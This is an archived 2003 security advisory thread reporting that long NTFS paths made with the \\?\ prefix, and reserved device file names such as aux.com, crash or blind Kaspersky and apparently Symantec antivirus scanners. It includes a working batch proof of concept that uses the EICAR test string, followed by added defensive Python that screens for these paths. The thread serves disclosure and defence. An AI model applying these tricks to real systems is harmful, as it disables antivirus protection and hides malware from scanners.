FW: Re[2]: SECURITY.NNOV: Kaspersky Antivirus DoS

2003-02-15T00:00:00
ID SECURITYVULNS:DOC:4081
Type securityvulns
Reporter Securityvulns
Modified 2003-02-15T00:00:00

Description

Dear Symantec -

I will rely on the Bugtraq moderator to help steer this process appropriately in the public forum (delay post, etc) since I am inexperienced in these matters.

There appear to possibly be three DoS vulnerabilities in at least one Symantec AntiVirus product. Initial report from Zaraza indicated problems in Kaspersky AV, but the problem also appears to affect Symantec AV CE 8.00.9374 on Win2K Server SP3.

I cannot do thorough testing, but I believe I've confirmed the results on my PC twice. I'm not a security researcher, so someone else needs to look at the potential problem to confirm this.

I've been asked by Zaraza to post this to bugtraq. I wanted to let Symantec know first if possible, but I am posting to Bugtraq simultaneously because if I found this based on Zaraza's work, others must surely already be aware of it (if the problem is genuine). There has been no independent confirmation of my results by any qualified security researcher as far as I know.

- Jim

3APA3A> Dear James C Slora Jr,

3APA3A> It could be nice if you send a copy of this message to bugtraq.

3APA3A> --Tuesday, February 11, 2003, 9:24:27 PM, you wrote to 3APA3A@SECURITY.NNOV.RU:

JCSJ> Privet, zaraza

JCSJ> 1, 2 and 3 seem to apply to Symantec AntiVirus 8.00.9374 as well. I'd rather
JCSJ> let someone more qualified and respected (such as yourself) check this out
JCSJ> before posting to Bugtraq, though.

JCSJ> After the exploit for 1 and 2, the SAV user interface runs OK, but both realtime and
JCSJ> manual scanning silently fail. The exploit for 3 appears to give the same result
JCSJ> as your Kaspersky tests. I tried 3 first, then 1-2.

JCSJ> - Jim

JCSJ> -----Original Message-----
JCSJ> From: 3APA3A [mailto:3APA3A@SECURITY.NNOV.RU]
JCSJ> Sent: Tuesday, February 11, 2003 05:10
JCSJ> To: bugtraq@SECURITY.NNOV.RU; bugtraq@securityfocus.com
JCSJ> Subject: SECURITY.NNOV: Kaspersky Antivirus DoS

JCSJ> Title:           Kaspersky Antivirus DoS
JCSJ> Affected:        Kaspersky Antivirus 4.0.9.0
JCSJ>                  (Server and Workstation version on
JCSJ>                  Windows NT 4.0 and Windows 2000).
JCSJ> Author:          ZARAZA <3APA3A@SECURITY.NNOV.RU>
JCSJ> Vendor:          Kaspersky Lab
JCSJ> Date:            January, 30 2003
JCSJ> Risk:            Average
JCSJ> Exploitable:     Yes
JCSJ> Remote:          Yes (for server versions)
JCSJ> Vendor Notified: January, 30 2003

JCSJ> I. Introduction:

JCSJ> Kaspersky Antivirus (KAV) is a family of antiviral products.

JCSJ> II. Vulnerability:

JCSJ> A few vulnerabilities were identified. The most serious allows a user to crash the
JCSJ> antiviral server remotely (write access to any directory on the remote
JCSJ> server is required).

JCSJ> 1. Long path crash
JCSJ> 2. Long path prevents malware from detection
JCSJ> 3. Special name prevents malware from detection

JCSJ> III. Details:

JCSJ> 1. Long path crash

JCSJ> The NTFS file system allows paths of almost unlimited length to be created. But
JCSJ> the Windows API does not allow a path longer than 256 bytes. To prevent the
JCSJ> Windows API from checking the requested path, the \\?\ prefix may be added to the
JCSJ> filename. This is a documented feature of the Windows API. Paths longer than
JCSJ> 256 characters will cause the KAV monitor service to crash or hang with 100%
JCSJ> CPU usage. The possibility of code execution has not been researched.

JCSJ> 2. Long path prevents malware from detection

JCSJ> A long path will also prevent malware from being detected by the antiviral scanner.

JCSJ> 3. Special name prevents malware from detection

JCSJ> It's possible to create an NTFS file with a name like aux.vbs or aux.com.
JCSJ> Malware in this file will not be detected.

JCSJ> IV. Exploit:

JCSJ> This .bat file demonstrates the vulnerability.

JCSJ> 1,2 Long path crash & Long path prevents malware from detection

JCSJ> @echo off
JCSJ> SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
JCSJ> mkdir \\?\c:\%A%
JCSJ> mkdir \\?\c:\%A%\%A%
JCSJ> mkdir \\?\c:\%A%\%A%\%A%
JCSJ> mkdir \\?\c:\%A%\%A%\%A%\%A%
JCSJ> mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
JCSJ> mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
JCSJ> echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >>\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com

JCSJ> 3. Special name prevents malware from detection

JCSJ> echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >>\\?\c:\aux.com

JCSJ> V. Vendor

JCSJ> No response from vendor.

JCSJ> --
JCSJ> http://www.security.nnov.ru
JCSJ>          /\_/\
JCSJ>         { , . }     |\
JCSJ> +--oQQo->{ ^ }<-----+ \
JCSJ> |  ZARAZA  U  3APA3A   }
JCSJ> +-------------o66o--+ /
JCSJ>                     |/
JCSJ> You know my name - look up my number (The Beatles)
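The two evasion conditions the advisory describes (a file reachable only through the \\?\ prefix because its plain path exceeds MAX_PATH, and a file whose name is a DOS device name such as aux.com) can be screened for before a scanner tries to open a file. The following Python is an added example and is not code from the advisory, the e-mail thread, Kaspersky or Symantec; the function names are assumptions, while the reserved device names (CON, PRN, AUX, NUL, COM1-COM9, LPT1-LPT9, matched with or without an extension) and the MAX_PATH value of 260 are the documented Win32 naming rules. The sample paths at the bottom are constructed to mirror the .bat file above.

```python
# Added example (not from the advisory or the e-mail thread): a pre-scan path
# check for the two evasion conditions described above. Function names are
# assumptions; the reserved names and MAX_PATH come from the documented Win32 rules.

# DOS device names that Win32 file APIs resolve to devices regardless of the
# directory or extension: "aux.com" and "aux.vbs" both open the AUX device.
RESERVED_DEVICE_NAMES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)

# Limit for Win32 paths that do not carry the \\?\ prefix; the count includes
# the terminating NUL, so the longest usable plain path has 259 characters.
MAX_PATH = 260

EXTENDED_PREFIX = "\\\\?\\"          # \\?\
EXTENDED_UNC_PREFIX = "\\\\?\\UNC\\"  # \\?\UNC\


def strip_extended_prefix(path):
    r"""Return (path_without_prefix, had_prefix).

    \\?\C:\dir\f   -> C:\dir\f
    \\?\UNC\srv\s  -> \\srv\s
    """
    if path.upper().startswith(EXTENDED_UNC_PREFIX):
        return "\\\\" + path[len(EXTENDED_UNC_PREFIX):], True
    if path.startswith(EXTENDED_PREFIX):
        return path[len(EXTENDED_PREFIX):], True
    return path, False


def is_reserved_component(name):
    """True if one path component is a DOS device name, with or without an extension."""
    # Win32 matches the device name against the part before the first dot,
    # ignoring case and trailing spaces, so "aux.vbs", "AUX" and "nul." all match.
    base = name.split(".", 1)[0].rstrip(" ")
    return base.upper() in RESERVED_DEVICE_NAMES


def check_path(path):
    """Return a list of findings for a path; an empty list means neither evasion
    condition applies and an ordinary MAX_PATH-bounded Win32 open() can reach it."""
    findings = []
    plain, had_prefix = strip_extended_prefix(path)

    # Conditions 1 and 2 from the advisory: the file exists only because it was
    # created through the \\?\ prefix; its plain path is longer than MAX_PATH allows.
    if len(plain) + 1 > MAX_PATH:
        findings.append(
            f"length {len(plain)} exceeds MAX_PATH ({MAX_PATH})"
            + (" (created via \\\\?\\ prefix)" if had_prefix else "")
        )

    # Condition 3: a component that is a DOS device name is opened as the device,
    # not the file, by any caller that does not itself use the \\?\ prefix.
    for component in plain.split("\\"):
        if component and is_reserved_component(component):
            findings.append(f"reserved device name component {component!r}")
    return findings


def advisory_style_path(segment_len=200, depth=7, drive="c:"):
    r"""Build a \\?\ path shaped like the advisory's .bat file: `depth` nested
    directories of `segment_len` 'A's, the innermost carrying a .com extension
    (constructed sample, not the advisory's exact string)."""
    segment = "A" * segment_len
    return EXTENDED_PREFIX + drive + "\\" + "\\".join([segment] * depth) + ".com"


if __name__ == "__main__":
    samples = (
        advisory_style_path(),          # conditions 1/2: deep \\?\ path, EICAR in a .com
        "\\\\?\\c:\\aux.com",           # condition 3: reserved device name
        "c:\\windows\\notepad.exe",     # ordinary path, should be clean
    )
    for p in samples:
        shown = p if len(p) <= 60 else p[:60] + "..."
        print(shown, "->", check_path(p) or "clean")
```

The check is only a screen: it tells you which files a MAX_PATH-bounded, unprefixed Win32 caller will fail to open or will open as a device. A scanner that must actually read such files has to build its own paths with the \\?\ prefix, which turns off both the length limit and the device-name parsing for that call.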